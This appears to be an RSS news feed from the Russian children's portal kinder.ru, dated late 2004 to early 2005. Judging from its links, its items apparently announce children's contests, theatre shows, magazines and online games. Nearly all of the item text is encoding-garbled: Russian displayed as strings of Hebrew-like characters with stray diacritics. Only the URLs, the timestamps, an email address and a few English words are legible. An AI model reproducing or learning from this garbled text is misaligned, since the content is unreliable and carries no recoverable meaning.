    - א־ֵ ֹװֱװֵֹּ ְֱֱִװ ֽ־ַֿֿ ׳ֿ׀ֿׂ׃ֿ׳.
    - "כֱִַֿ ־ֱֱֹּ ֱַֹׂװ״ ׳ ֵָֻֻֿ? כֱֻ ׀ֿׁ׳ֹּ׃ׁ ֱִֻּֿֿ? נֵֽֿױ ֲ״ְװ ֱֲֻּױֹ? - ‏װֿ ֱ ֱֵֻֽ־״ - ֹױֽׂױִ? נֵֽֿױ ְִֹּ ֳֵֹֻֻּּֿֿ־ֹׂױְװ ֿװֻׂװֹֻ?"
    - כּ£׀ֱ, זֹֹּ׀׀ ֹ כֱ׀ֹ-כֱ׀ֹ ׀ֿׂ׳ֵֹּ ֱׂ׃׃ִֵּֿ׳ֱ־ֵֹ ֹ ׃ ױִֿ׳ּֿ״׃װ׳ֵֹֽ - ֿװֻׂ׳ְֱװ ִּׁ ְֲּֿ־ֱװֵּ״־ָ כל³נבֱֽ־ֿ׳ ֿװ׳ֵװ ־ֱ װֹ ׳ֿ׀ֿׂ׃, ֱ - װֱֻײֵ ֽ־ַֿֿ ִׂױַֿ ֹ־װֵֵׂ׃־ֿ ֹ ׀ֿ־ֱ׳ֱװֵּ״־ֿ ֹ־ֱֳֶֹֹֽֿׂ.
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/redir.asp?id=845 -Fri, 04 Mar 2005 15:21:02 +0300 -otter@kinder.ru -
    - - -הֵװ׃ֹֻ ִֽֿ 18 ַ.םֿ׃ֻ׳ -ףױ׀ֱֵּׂ״ֲֽֿ "װֿ יָ הֵװ׃װ׳ֿ" ׀ֿ׀ּֿ־ֹּ׃ׁ ֵ£ ִֿ־ֹֽ ִַּֿֿײֱִ־־ֽ ־ֲֵּֿ״ֹֽ ֶֿװֱּֿ״ֲֽֽֿֿ "םֱֹּ ׳ ֱֲ׃׃ֵ־ֵ". הֵװ׃ֹֻ ִֽֿ ֱֱֲִַֹּֿׂװ ׳׃ֵָ װֵָ ְִֵּ, ֻֿװֵֿׂ ׃ַֹּֽֿ ׀ֱִֹֿׂװ״ ֱֱּֽֽ ־ֲִֵֵָֹֽֿֿ ִּׁ ־ָֹ ׀ֳִֵֿׂױׂ. תִֿֿׂ׳״ֵ ֹ ױֲֹֻּ ־ֱָֹ ִֵװֵ — ֱַּֿ ׳ֱֵ ֱֲֵַׂ־ֹ־ֿ ִֵֿׂ׃װֹ!
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/redir.asp?id=2736 -Fri, 04 Mar 2005 15:19:51 +0300 -otter@kinder.ru -
    - - -קֵ׃ֵ־־ֵֹ ֱֻ־ֹֻױּ ׳ ֱֵֵַּׂ "נֱּ־ֵװֱ ֵֽװ. קֵ׃־ֱ." -קֵ׃־ֱ. נִֵׂױ׳׃װ׳ֵֹ ֲֿ־ֿ׳ֵּ־ֹׁ ֹ ֵַֿ-װֿ ־ֿ׳ַֿֿ ֹ ׃׳ֵײֵַֿ ׳ ־ֱֵ ײֹ־ֹ. ףֱֵֽֿ ׳ֵֽׁׂ ׀ַֿֿ׳ֹֿׂװ״ ֹ ׀ֱּֽֿׁׂװ״ ֿ ְֲּ׳ֹ ֹ ִׂױײֲֵ. ב ׃ ֵֻֽ װֿ ֽֿײ־ֿ ֲֿ׃ױִֹװ״? ף ִֹֿׂװֵֹּֽׁ? ף ִׂױ״ֹֽׁ? טֿֿֿׂ ֲ, ־ֿ ־ֵ ׳׃ֱִֵַ ׀ּֿױֱֵװ׃ׁ. ב ֵ׃ֹּ ׃ ׀ֵֶֿׂ׃׃ֹֿ־ֱּֽֿ? ף ׀׃ַָֹּֽֿֿֿ? נֿ-ֵֽֽֿױ, ֲֵּ׃װֱׁׁ ִֵֹׁ. ףֱַּֿ׃־? פֱִַֿ ׀ֹׂ׃ִֵֹֿ־ׁװֵ׃״!!!
    -ףפגװױׂ׃ ׀ֱֱִֵֵַּׂװ קֱֽ ׀ֱַֽֽֿׂׂױ ִֵװ׃ַֻֿֿ ֿװֱִָ ׳ ִֵװ׃ֻֽֿ ִֿֿֿׂ׳ֹװֵּ״־ֽֿ ֻֽֿ׀ֵֻּ׃ֵ "לֹװ׳ֹ־ֿ׳ֿ".
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/obzor/spb_tur_1.htm -Fri, 04 Mar 2005 15:17:24 +0300 -otter@kinder.ru -
    - - -םֿ׃ֻֿ׳׃ֹֻ ִֵװ׃ֹֻ װֱֵװׂ װֵ־ֵ -כ 200-ֵּװ־ֵֽױ ְְֲֵֹּ ח.ט.ב־ִֵׂ׃ֵ־ֱ ׳ װֱֵװֵׂ ׀ֵֽׂ״ֱֵׂ - ׃׀ֵֻװֱֻּ״ "הְֽֿ׳ֱֻֿ".
    -נֿ־ֱֻֽֿ״װֵ׃״ ׃ ֵׂ׀ֵׂװױֱֽֿׂ װֱֵװֱׂ ־ֱ ֱֽׂװ ֹ ֱ־ֿװֱֳֹֹֽׁ ֻ ׃׀ֵֻװֱֻּֽׁ.
    -נִֵֵׂ ֱֻײִֽ ׃׀ֵֻװֱֵֻּֽ ׳ ֵֶֿ װֱֵװֱׂ ׀ֿׂ׳ִֿׁװ׃ׁ ֻֿ־׃ױּ״װֱֳֹֹ ׀ֿ ֵֽװִֵֹֻֿ װ׳ֵֿׂ׃ַֻֿֿ ֱׂ׳ֹװֹׁ ִֵװֵ ׳ ׃ֵֽ״ֵ. -
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/teatr_tenei/obzor_dtt_1.htm -Wed, 02 Mar 2005 17:14:18 +0300 -otter@kinder.ru -
    - - -חֱֵװֱ-ֱּ״ֱֽ־ֱָ (׃ֱװ ֻּֿ ¹1159) -נֿׂ׳ִֹֿװ׃ׁ ֹּװֱֵׂװױׂ־ֱׁ ׳ֹֻװֹֿׂ־ֱ. נֵׂ׳ װױׂ ׳ֹֻװֹֿׂ־ ׀ִֵֿׂװ ִֿ 1 ֱֽׁ 2005 ֱִַֿ. ןװ׳ֵװ ׀ֹׂ׃ֱּװ״ ׀ֿ e-mail. ק ֱ׳ֹ׃ֹֽֿ׃װֹ ֿװ ׀ּֿ־ֿװ ֹ װֿ־ֿ׃װֹ ֿװ׳ֵװֿ׳ ֱ ־ָֹ -־ֱֹ׃ְּׁװ׃ׁ ֱֲּּ, ׀ֿ ׃ױֵֽֽ ֻֿװָֿׂ ֲױִױװ ֿ׀ִֵֵֵּׂ־ ׀ֲִֵֹֿװֵֹּ. ץֱ׃װ־ֹֹֻ, ֱ־ׁ׳ֵֹ ׀ֵׂ׳ֵ ֵֽ׃װֱ ׳ ֲֵֽֿ ֱֵװֵ ֹ ׀ֿ ֱֻײִֽֿױ ֹ ֱֱִ־ֹ, ׀ּֿױֱװ ֻ־ַֹֹ ֹֹּ ִׂױֵַֹ ׀ֹׂ. -ו׃ֹּ ׀ֵׂ׳ װױׂ ׀ִֵֿׂװ ױ׃׀ֵ־ֿ, ׳ ׃ֵ־װֲֵׁׂ ׳ֹֻװֹֿׂ־ֱ ׀ִּֿֿׂײֹװ׃ׁ.
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/redir.asp?id=2911 -Mon, 28 Feb 2005 10:52:16 +0300 -otter@kinder.ru -
    - - -הֹ׃װֱ־ֳֹֿ־־ֱׁ ֲֿױְֱֱׁ ֹּֽֿ׀ֱֱִֹ ׀ֿ ֲַֹֹֹּֿֿ -מֱֱװֱ ֵַֹׂ׃װֱֳֹׁׂ ױֱ׃װ־ֹֻֿ׳ ׳װֿֿׂ ִֹ׃װֱ־ֳֹֿ־־ֿ ֲֿױְֱֵ ֹּֽֿ׀ֱִֹ ׀ֿ ֲַֹֹֹּֿֿ. נְֱֱַֹּׂװ׃ׁ ֱֻֽֿ־ִ ױֵ־ֹֻֿ׳ 6 - 11 ֱֻּ׃׃ֿ׳ ׃ ׀ֵׂ׀ֱִֿ׳ֱװֵֹּֽׁ.פֱֵֽ ֹּֽֿ׀ֱִֹ הןןג-2005 - "הֱֽֿ־ֵֹ ײֹ׳ֿװ־ֵ". הּׁ ױֱ׃װֹׁ ־ֲִֵָֹֽֿֿֿ ֱֵַֹׂ׃װֹֿׂׂ׳ֱװ״׃ׁ ִֿ 14 ֱֽׂװֱ 2005 ֱִַֿ. - -
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/redir.asp?id=1954 -Fri, 25 Feb 2005 18:59:41 +0300 -otter@kinder.ru -
    - - -ֻּֿ״־ֵ ֽױֵֹ ׳ י־װֵׂ־ֵװֵ -ק ֱֱָֻֽׂ ֵֻּװֿׂ־־ַֿֿ ײױׂ־ֱֱּ «קֿ׀ֿׂ׃ י־װֵׂ־ֵװ-ֱֲֿֿׂ׳ֱ־ֹׁ» ׀ְֱֱַֹּׂװ׃ׁ ׳׃ֵ ײְֱֵֵֹּ ׀ֹׂ־ׁװ״ ױֱ׃װֵֹ ׳ ֱֳֹֹֻ «ֻּֿ״־ֵ ֽױֵֹ ׳ י־װֵׂ־ֵװֵ». י ֻ 60-ֵּװְֹ נֲִֵֿ ֲױִֵװ «ֿװֻׂװ ׀ֵׂ׳ ֱּ» – ֱּ, ׀ֿ׃׳ֵׁ־־ קֵֹֻּֿ ןװֵֵ׃װ׳ֵ־־ֿ קֿ־ֵ.
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/redir.asp?id=1605 -Thu, 24 Feb 2005 17:05:05 +0300 -otter@kinder.ru -
    - - - -23 זוקעבלס
    הומר תב‎יפמיכןק ןפו‏וףפקב

    -הֲֿֿׂ ׀ֿײֱּֿ׳ֱװ״ ־ֱ ׀ֱִׂ־ֹ־ױְ ׃װֱׂ־ֹֻױ!
    [נֲִֿֿׂ־ֵֵ...]]]>
    - -Thu, 24 Feb 2005 17:04:51 +0300 -otter@kinder.ru -
    - - -ב־׃ֱֲּֽ״ "עֹװֽ ִֵװ׃װ׳ֱ" -

    ףֽֿװֹׂװֵ ִַּֿֿײֱִ־־ֵ ֶֿװֱֶַֹֹֿׂ ׃ "תֹֽ־ֵַֿ ׀ֱִׂ־ֹ־ַֿֿ ֻֿ־ֳֵׂװֱ", ׀ִֵֵַֿֿׂ ׳ פד "םֿ׃ֻ׳ֵֿׂ״ֵ". מֱ װֽֿ ֵֵֵֶֹׂ׃ֻֽֿ ֿױ ֲֵׁׂװֱ ׳׃װױ׀ֹֹּ ׃ ּױֹֹֽ ׃׳ֹֹֽֿ ־ֱֵֹֽֽֿׂ. הֲֿֿׂ ׀ֿײֱּֿ׳ֱװ״ ׳ ױ׳ֱֵֻּװֵּ״־ֵֿ ׀ױװֵֵ׃װ׳ֵֹ ׳ ׃װֱׂ־ױ װֱ־ֳֵ׳!
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/redir.asp?id=2836 -Wed, 23 Feb 2005 00:18:31 +0300 -otter@kinder.ru -
    - - -קֵ׃ֱֵּׁ ֱֽ׃װֵׂ׃ֱֻׁ -ףֱװ ֲֿ־ֿ׳ֹּ ֱִֹ־ ֹ ׃־ֿ׳ֱ ֱֲֿׂװֱֵװ.
    -נִֵׂ׃װֱ׳ֵּֽׁ ׳ֱֽ ־ֿ׳ ׳׀ױ׃ֻ ׳ֹׂװױֱּ״־ֿ קֵ׃ֵּֿ ֱֽ׃װֵׂ׃ֻֿ: ֱׂ׃׃ֱֻ ֲֿ ֹ׃װֹֹֿׂ ֱׂ׳ֹװֹׁ ַֹׂױֵֻ, ׃׀ֱׂ׳ֿ־ֱׁ ֹ־ֱֳֶֹֽֿׁׂ ׀ֿ ֱׂ׃ֵװױ ִֵׂױֻװֱֿׂ ֹ ֽֿ־ֿ׃װֹ ִ׳ֱַֹװֵּׁ; ־ֿ׳ֵ ׀ִֵֹֻּֿ ֹ ֱׂ׃ֱֻׂ׃ֹֻ; ־ֿ׳ֱׁ ֱַּ׳ֱ ֹ גֲֹֹֹּ.
    -י ׀ִֹֿׂׂ־ַֿֿ ֱֽװֱֱֵֹּׂ, ֻֿװֽֿׂ ׳ ֱ׀ֱ׃ֹּ׃״ ֿ׃ֵ־״ְ, ֽ ־ֱױֹֽ ׳ֱ׃ ֱֽ׃װֵֹׂװ״ ־ֿ׳ֵ ׀ִֵֹֻּֿ. נׁװ״ ־ֿ׳ָ ַֹׂ ׀ַֽֿֿױװ ׳ֱֽ ֱׂ׳ֹװ״ ׀ֱֽׁװ״, ׳־ֱֹֽװֵּ״־ֿ׃װ״ ֹ ִֹֻֿֿׂ־ְֱֳֹ ִ׳ֹײֵ־ֹ.
    - עֱִֵּ "םױֵ ־ֱ ׃װֵּֿ" ֹ "ףװֱׂ־ֱ ֱׂ׳ֵֵּ־ֹ" ֱׂ׃׃ֱֻײױװ ׳ֱֽ ֱֻֻ ֹ ֲױֱַֹֽ ׃ֱִֵּװ״ ִֵּֽֿ״ ֵֵַּ־ֱִׂ־ַֿֿ ֹ׃װֲֵֹׂװֵּׁ, ֱ װֱֻײֵ ־ֵ׃ֻּֿ״ֻֿ ֵּװְֱָֹ ׀ִֵֻּֿֿ. מֱ ׀ֵֵֹֽׂׂ ־ֵ׃ֻּֿ״ָֹֻ ֵֻּװֿׂ־־ָ ׳ֹֻװֹֿׂ־ ֹ ַֹׂױֵֻ ֽ ׀ִּֿֿׂײֹֽ ֹױֵ־ֵֹ ֿ׃־ֿ׳ ֵֻּװֵֹׂ׃װ׳ֱ.
    -ם װֱֻײֵ ׀ִּֿֿׂײֹֽ ־ֱֹֻֽֿװ״ ׳ֱ׃ ׃ ֹ׃ֻױ׃׃װ׳ֽֿ ֱ׀׀ֱֳֹֹֹֻּ, ־ֿ׳ֹֽ ִֵװ׃ֹֹֻֽ ִֵֹּֽֽֿׁ ִֵֿײִ, ֱ ־ֱ ׃װּֿ ױֱֻׂ׃ׁװ ־ֿ׳ֵ ַֹֹֿׂ־ֱּ״־ֵ ְֱֲִּ.
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/redir.asp?id=2436 -Wed, 23 Feb 2005 00:17:53 +0300 -otter@kinder.ru -
    - - -ףֱֻֿ־ֱׁ ׳ֹֻװֹֿׂ־ֱ -הֵװ׃ֹֻ ׀ֿׂװֱּ "ףּֿ־ֻֿ" ׀ֱֱֵַֹּׂװ ִֵװֵ -׀ֹׂ־ׁװ״ ױֱ׃װֵֹ ׳ "ףֱֻֿ־ֿ ׳ֹֻװֹֿׂ־ֵ".
    ףִֵֹׂ ׳׃ֵָ, -׀ֱׂ׳ֹּ״־ֿ ֿװ׳ֵװֹ׳ָֹ ־ֱ ׳ֿ׀ֿׂ׃ ׳ֹֻװֹֿׂ־, ֱַׂׂ׳ְֱװ׃ׁ ׀ֹׂ!
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.solnet.ee/games/g7_v29.html -Wed, 23 Feb 2005 00:17:47 +0300 -otter@kinder.ru -
    - - -כֱׂװֹ־ֹֻ-׳ֱֵּ־װֹ־ֹֻ, ׃ֱִֵּ־־ֵ ֹ ׀ֹׂ׃ֱּ־־ֵ ֲֵׁׂװֱֹֽ -
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/konkurs/galerea2_2005.asp -Wed, 23 Feb 2005 00:17:24 +0300 -otter@kinder.ru -
    - - -הֵװ׃ֹֻ ׀ֿׂװֱּ "ףּֿ־ֻֿ" -קֵּ ֵֶ׳ֱּׂ״׃ֹֻ, 72- ־ֵֽֿׂ ֵײֵֵֽ׃ׁ־ַֿֿ ׳ֹׂװױֱּ״־ַֿֿ -ֱׂ׳ֱֵֻּװֵּ״־ֿ-׀ֿ־ֱ׳ֱװֵּ״־ַֿֿ ִֵװ׃ַֻֿֿ ײױׂ־ֱֱּ "ףּֿ־ֻֿ", ׳ ֻֿװֽֿֿׂ: -ֱׂ׃ֱֻׂ׃ֹֻ ֹ ׃ֵֹֹׂ "ב׳װֲֹֹּֽֿֿ" ֹ "חֵֵֽֿװֵֹׂ׃ֵֹֻ ֶַֹױׂ"; -ֱֱִַֹֻ ֿ ׀ֱ׀ֹ־ָ ֹ־׃װׂױֱֽ־װֱָ; -ֱֽ׃װֵׂ-ֱֻּ׃׃ - ֱִֵֵּֽ ׃ִֵֵֹֻׂ-׳ֱֵּ־װֹ־ֹֻ ֹ ֿװֻׂװֻױ ִּׁ ׀ֱ׀; -׃ּֿ׳ֱ ֹ ־ֿװ ִֵװ׃ָֹֻ ׀ֵ׃ֵ־, װֹׂ ׳׀ױ׃ֱֻ ְֱֽֿׂ ׳ ֻֿֿׂװָֹֻ װֱ־ֱָֹֻ -ֹ ִׂױֵַֹ ֱֽװֱֵֹּׂ.
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/redir.asp?id=314 -Wed, 16 Feb 2005 16:14:19 +0300 -otter@kinder.ru -
    - - -הֵװ׃ֹֻ ׃ֱֻֿ־ ײױׂ־ֱּ -מֿ׳ֵֿ ׳ ֹ־װֵׂ־ֵװ-ײױׂ־ֱֵּ:
    -םֱֵּ־״ֱֻׁ ׃ֱֱֻֻ ִּׁ ֲּֿ״ֿ ִֵ׳ֹֻֿ
    -כֱֻ ֽ ׀ֱִֿׂ׳ֹּּׁ ׀ֱ׀ױ
    -ב־ֱ׃װֱ׃ֹׁ כֱֵֹּׂ־ֱ "כֱֿ״ֹ ֹ׃װֹֹֿׂ"
    -כֱֻ ׳ִֵַֹּּׁ ִֵׂ׳־ֵֹ ֻ־ַֹֹ
    -כֿ־ֻױׂ׃ ְ־ָ ׀ֿװֿ׳ ֹ ׀ֹ׃ֱװֵֵּ.
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/redir.asp?id=451 -Wed, 16 Feb 2005 16:14:13 +0300 -otter@kinder.ru -
    - - -דֵ־װׂ ִֹ׃װֱ־ֳֹֿ־־ַֿֿ ֱֲֿֿׂ׳ֱ־ֹׁ ךהןף -11-16 ֵֶ׳ֱּׁׂ ׀ֿׂ׳ִֹֿװ׃ׁ ִֹ׃װֱ־ֳֹֿ־־ ֻֿ־ֻױׂ׃-׀ֵֻֿׂװ ־ֱ ֱ־ַֹּ׃ֻֽֿ ֵֻׁ "My Sweet Valentine". ץֱ׃װ־ֹֹֻ ׃ֹֿ־ְׁװ ֹ ְֶּֽֿֿׁׂװ ׃׳ֹֿ "׳ֱֵּ־װֹ־ֹֻ", ֻֿװֵֿׂ ׀ֿװֽֿ ׀ֵֵׂ׃ְֱּװ ׳ֹׂװױֱּ״־ֽ ִׂױ״ֽׁ.
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/redir.asp?id=301 -Thu, 03 Feb 2005 16:29:18 +0300 -otter@kinder.ru -
    - - -הֵװ׃ֹֻ ײױׂ־ֱּ "םױֱֹֻּׂ" -‏ֹװֱװֵ ׳ ֵֶ׳ֱּׂ״׃ֻֽֿ ־ֵֵֽֿׂ:
    -תֱִׂ׳׃װ׳ױ, הֱ־ֹׁ!
    -ב־ִֵׂ׃ֵ־ "נֹׂ־ֳֵ׃׃ֱ ־ֱ ַֹֿֿׂ־ֵ"
    -י׃װֹֿׁׂ ײֹ־ֹ ט.-כ. ב־ִֵׂ׃ֵ־ֱ
    -קֵֹֹֻּ ׃ֱֻֿ־ֹֻ הֱװ׃ַֻֿֿ כֵּֿֿׂ׳׃װ׳ֱ
    -ב־ִֵׂ׃ֵ־ "הױֵׂ־״ חֱ־׃".
    -פֱֻײֵ ׳ ־ֵֵֽֿׂ: ֻֿׂ׃׃׳ִֿׂ םױֹֹֻּׂ, ׃װָֹֹ, ֱׂ׃׃ֱֻ, ׃ֱֹֻֻ, ַּֿֿ׳ֹֻּֽֿֿ, ַֹׂ, ֱװֵֹ, ֱֱִַֹֻ, ֱֵֵַּׁׂ ֹ׃ֻױ׃׃װ׳ םױֹֹֻּׂ - הֱװ׃ֱֻׁ ײֹ׳ֿ׀ֹ׃״ XIX ׳ֱֵֻ, ֹֻֻֽֿ׃ "נְֵֹֻּׂ־ֹׁ םױֹֹֻּׂ".
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/redir.asp?id=614 -Thu, 03 Feb 2005 16:24:21 +0300 -otter@kinder.ru -
    - - -"ףֱ־״ֱֻ - גֵֵ־ ֹֻֻּֿׂ" -קֵּ ־ֿ׳ ־ֵֽֿׂ ײױׂ־ֱֱּ, ׳ ֻֿװֽֿֿׂ:
    -קֵֵֽׂ־ֱ ֱִַֿ
    -פֱ־ֱ ֱֽ׃װֱֵׂ תּֿֿװֵֿ ףֳִֵֵׂ
    -ב־ֵַּ ֹ ־ֱֲֵױִֹֻ
    -ה־ֵ׳־ֹֻ בֹּ־ כֱֲּֿׂ£׳ֿ
    -ףֵ׳ֵׂ־ֱׁ ֵַֹּׁ
    -נֵֽֿױ ׳׃ֵ ְֲּׁװ ׃ּֿ־ֵ־ֵ ֱֹֹֻ
    -י־װֵֵׂ׃־ֱׁ ׀ֱִֹֿׂׂ
    -ףװָֹֹ ׳ ֵ׃װ״ ׀ֱִׂ־ֱֹֻ
    -הּׁ ַֻֿֿ-װֿ ײֹ־״ ־ֵ ׳ֱײ־ֱ.

    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/redir.asp?id=1033 -Tue, 01 Feb 2005 16:05:15 +0300 -otter@kinder.ru -
    - - -"װֿ ֱֱִַֿ־ֵֿ ִֵװ׃ֵֻֿ װ׳ֵֿׂ׃װ׳ֿ" - [נֲִֿֿׂ־ֵֵ...]]]> -http://www.kinder.ru/obzor/rgbi.htm -Tue, 25 Jan 2005 18:13:14 +0300 -otter@kinder.ru - - - -י ׃־ֿ׳ֱ ׀ֱִׂ־ֹֻ ֻ־ַֹֹ - [נֲִֿֿׂ־ֵֵ...]]]> -http://www.kinder.ru/obzor/book_vistavka.htm -Tue, 25 Jan 2005 18:12:55 +0300 -otter@kinder.ru - - - -ןֲֵֽֿ׃ֻֿ׳׃ֹֻ ׀ֿװֵֹ׃ֹֻ ֻֿ־ֻױׂ׃ "כינבעיףןקשך לבעוד" - -עֱֲֿװ ׀ֹׂ־ְֱֹֽװ׃ׁ ִֿ 10 ֵֶ׳ֱּׁׂ 2005 ֱִַֿ.
    -צִֵֽ ׃װָֹֿ׳ ֿװ ְ־ָ ׀ֿװֿ׳!
    -
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/obzor/poet-konkurs.htm -Tue, 25 Jan 2005 18:12:32 +0300 -otter@kinder.ru -
    - - -"ֵֻּװֿׂ־־ֵ ׀ֱֽ׀ֱ׃" - ֹּװֱֵׂװױׂ־ ײױׂ־ֱּ ִּׁ ִֵװֵ ֹ ׳ֿׂ׃ָּ -מֿ׳ֵֿ ׳ ײױׂ־ֱֵּ.
    -י׃װֹֹֿׂ: לְֱִֹּֽ כִֵּֿ־ֻֿ׳ֱ "מֿ׳ִַֿֿ־ֹ ׀ֱִׂ־ֹֻ"
    -ק ֶֹֽׂױ: יַֿׂ״ צױֻֿ׳ "נֱִׂ־ֹֻ ִּׁ ֱֲֲֵֿׂ־ֱֹֻ"
    -NEW-׃ֱֱֻֻ: ףֵֵַׂ ףִֵֿ׳ "ףֱֱֻֻ ׀ֿׂ ִ׳ֿׂ־ֱֹֻ"
    -הֵװ׃ֵֹֻ ֻ־ֹײֹֻ: הֹֽװֹׂ "וֳֵֽ קּֿֿ־ֻֿ"(ֹ ֻ־ַֹֹ "כּֿֿׂ״ ָֹװֿׂ׃װֹ"
    -עִֵֹֻ ׳ֵׂ״: בֵֻּ׃ֱ־ִׂ קֳֵָֿֿ׳׃ֹֻ "פֱֽׂ׳ֱ. תֱֹֽ." -
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/redir.asp?id=572 -Thu, 20 Jan 2005 10:02:06 +0300 -otter@kinder.ru -
    - - -"כװֿ ֿ־ֹ, ִֵװֹ הֵװ׃ָֹֻ ִֽֿֿ׳?" -י־װֵׂ׳״ְ ב. טּ־ֹ־ֱ ׃ ִֵװ״ֹֽ הֵװ׃ַֻֿֿ ֱִֽֿ ¹18 ַ. םֿ׃ֻ׳.
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/redir.asp?id=2736 -Thu, 20 Jan 2005 10:00:01 +0300 -otter@kinder.ru -
    - - -לױֵֵ ־ֿ׳ִַֿֿ־ֵֵ ׀ֿײֱֵּ־ֵֹ -ףֱװ ֱ־׃ֱֲּֽׁ עֹװֽ ִֵװ׃װ׳ֱ ׃ֿ׳ֵֽ׃װ־ֿ ׃ ׃ֱװֽֿ הֵװ׃ֹֻ ִֽֿ ¹18 ׀ֿׂ׳ִֿׁװ ֻֿ־ֻױׂ׃ "לױֵֵ ־ֿ׳ִַֿֿ־ֵֵ ׀ֿײֱֵּ־ֵֹ"! ף׀ֵֹװֵ ׀ֹׂ־ׁװ״ ױֱ׃װֵֹ! נֲִֵֹֿװֵּׁ ײִױװ ׀ֹׂ!
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.detstvo18.org/konkurs.html -Mon, 20 Dec 2004 14:27:44 +0300 -otter@kinder.ru -
    - - -בֱּ׀ֱֵ׳׃ֹֻ ִֵװ׃ֹֻ ִֽֿ -מֱ ׃ֱװֵ ִֵװ׃ַֻֿֿ ֱִֽֿ ֿװֻּׂ׃ׁ ֱִֵּׂ "נֿ־ֱֻֽֿ״װֵ׃״ ׃ ־ֱֹֽ" ֱ װֿװ ױֲֵ־ ִַֿ. ףֿ ֽ־ַֹֹֽֿ ֲֵׁׂװֱֹֽ ֽֿײ־ֿ ׀ֿ־ֱֹֻֽֿװ״׃ׁ ֹ ׀ֱֲֿֿװ״׃ׁ ׀ֿ׃ִֵׂ׃װ׳ֽֿ ֵֻּװֿׂ־־ֿ ׀ֿװ.

    -קֿׂ׃ּֽ: ם־ֵַֹֿ ־ֱֹ ִֵװֹ ַֽֿױװ ֲװ״ ׀ֹׂ־ׁװ ׳ ׃ֵֽ״ְ!
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/redir.asp?id=1381 -Mon, 29 Nov 2004 15:05:13 +0300 -otter@kinder.ru -
    - - -םֱֵּ־״ֹֻ װֱֵװׂ ֲּֿ״ָֹ ֻױֻּֿ -ן׃ֵ־״ְ 2004 ֱִַֿ םֱֵּ־״ֻֽֿױ װֱֵװׂױ ֲּֿ״ָֹ ֻױֻּֿ ֹ׃׀ּֿ־ֹּֿ׃״ 16 ֵּװ. ף׳ֵֿ 16-ֵּװֵֹ װֱֵװׂ ֿװֱֵּֽ ׃װֱִׂ־ֿ ׀ֱַֽֽֿֿׂׂ "ם ֲִֵֹֿׁׂ ֱׂװֹ׃װ". ב ׃ֱֵ׃ ִֵֹװ ׀ִַֿֿװֿ׳ֱֻ ֻ מֿ׳ֽֿױ ִַֿױ - ַֿװֿ׳ׁװ׃ׁ ׃׀ֵֻװֱֻּ״ "נֱֱֵַֹּׂװ ף־ֵַױֱֻֿׂ" ֹ ֿװֱִָװֵּ״־ֿ-ֱׂ׳ֱֵֻּװֵּ״־ֱׁ ׀ֱֱַֽֽֿׂׂ "מֿ׳ִַֿֿ־ֵֵ ֱֵֶֻ".
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/redir.asp?id=1152 -Wed, 24 Nov 2004 13:02:54 +0300 -otter@kinder.ru -
    - - -תֱֱִַֿ־ֱׁ ׃װֱׂ־ֱ -ק "גֲֹֹּֿװֵֵֻ" ־ֱֵַֿ ֱֻװֱֱַּֿ ׳ ֱִֵֵּׂ "הֵװ׃ֵֻֿ װ׳ֵֿׂ׃װ׳ֿ" ֿ׀ױֲֹֻּֿ׳ֱ־ ־ֿ׳ ֱׂ׃׃ֱֻ אֹּ קֹװֵ־ֻֿ׳ֿ "תֱֱִַֿ־ֱׁ ׃װֱׂ־ֱ" ׀ֿׂ ִ׳ױָ ִֵ׳ֵֻֿ-װֹ־ִײֵֿׂ׳ ֹ ׀ֿׂ ׀ֱֵֻׂׂ׃־ױְ ׃װֱׂ־ױ גְֱַֹּֿׂ.
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://kinder.ru/BIBLIO/strana_1.asp -Mon, 15 Nov 2004 15:49:48 +0300 -otter@kinder.ru -
    - - -מֿ׳ֿ׃װֹ ׃ֱװֱ "לֱִױֹֻ" -מֱ ׃ֱװֵ ׀ֿׁ׳ֹּ׃ׁ ־ֿ׳ ֱִֵּׂ ׃ ֱֱֱִַֹֻֽ ־ֱ flash, ֱ װֱֻײֵ flash-ֱַֹׂ ִּׁ ִֵ׳ֵֻֿ "נֹׂ־ֳֵ׃׃ֱ ׃ֱֲֵֹֿׂװ׃ׁ ־ֱ ֱֲּ", ֹ ֵ£ ־ֿ׳ֵ ׀ֿװֵֹֻ, ִֵװ׃ֵֹֻ ֹׂ׃ױ־ֹֻ ֹ ִֵװ׃ֵֹֻ ֵֵֹׂ־ֹׁ.
    [נֲִֿֿׂ־ֵֵ...]]]>
    -http://www.kinder.ru/redir.asp?id=2630 -Mon, 08 Nov 2004 10:44:02 +0300 -otter@kinder.ru -
